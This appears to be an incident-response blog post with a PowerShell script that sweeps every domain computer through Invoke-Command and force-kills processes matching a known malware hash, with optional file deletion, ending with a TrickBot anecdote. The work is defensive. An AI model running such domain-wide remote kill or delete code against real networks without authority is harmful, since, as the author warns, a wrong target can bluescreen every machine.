What we’ll do is take our known malware hash and sweep the domain looking for a match at this instant. If we find one on a machine, we’ll kill that process and return the machine name and the various file names affected. If you’re deep in IR mode, you might also want to delete those affected files (or at least try to).

Our code should look something like the sample below. Again, BE CAREFUL: targeting the wrong process can easily bluescreen an entire domain in minutes. If you add the “delete” line and accidentally target something that Windows needs, those bluescreened devices won’t be coming back without help (every AV vendor has learned this the hard way):

function EnumAndKill {
    # Runs on each remote host via Invoke-Command; the target hash arrives as the argument
    param([string]$TargetHash)

    $retlist = @()

    foreach ($proc in Get-Process) {
        try {
            # hash the executable file on disk (processes without a path, e.g. System, throw and are skipped)
            $hash = (Get-FileHash -Path $proc.Path -Algorithm SHA1 -ErrorAction Stop).Hash
            if ($hash -eq $TargetHash) {
                $retval = [pscustomobject]@{
                    HostName    = $env:ComputerName
                    TargetHash  = $hash
                    ProcessName = $proc.Name
                    FilePath    = $proc.Path
                    Result      = ""
                }

                try {
                    Stop-Process -InputObject $proc -Force -ErrorAction Stop
                    # give the process a few seconds to go away before we check
                    $null = $proc.WaitForExit(5000)
                }
                catch { }

                if ($proc.HasExited) {
                    $retval.Result = "SUCCESS"
                    # possibly add a delete of $proc.Path here (depending on your situation)
                }
                else { $retval.Result = "ERROR" }
                $retlist += $retval
            }
        }
        catch {
            # error handling.  If the file can't be hashed, either it's not there or we don't have rights to it.
            # Either way there is nothing for us to kill, so move on to the next process.
        }
    }
    $retlist
}

$TargetHash = ""     # SHA1 of the known-malicious executable, confirmed as a true IoC for this incident
$targets = Get-ADComputer -Filter * -Properties DNSHostName
$count = $targets.Count
$i = 1
$DomainKillResult = @()

foreach ($targethost in $targets) {
    Write-Host "$i of $count - $($targethost.DNSHostName)"
    if (Test-Connection -ComputerName $targethost.DNSHostName -Count 2 -Quiet) {
        # ship the function to the remote host and run it there with our hash as its argument
        $DomainKillResult += Invoke-Command -ComputerName $targethost.DNSHostName -ScriptBlock ${function:EnumAndKill} -ArgumentList $TargetHash
    }
    ++$i
}


We *really* could have used something like this in an incident that I worked about a year ago. Multiple timezones, limited IT resources, and a variant of TrickBot that (at first) no AV product would detect, and later, even when the products would detect the malware, they stubbornly refused to stop or delete the executables involved.

Got any IR war stories to tell?  Please, use our comment form, let’s talk!

===============
Rob VandenBrink
Coherent Security
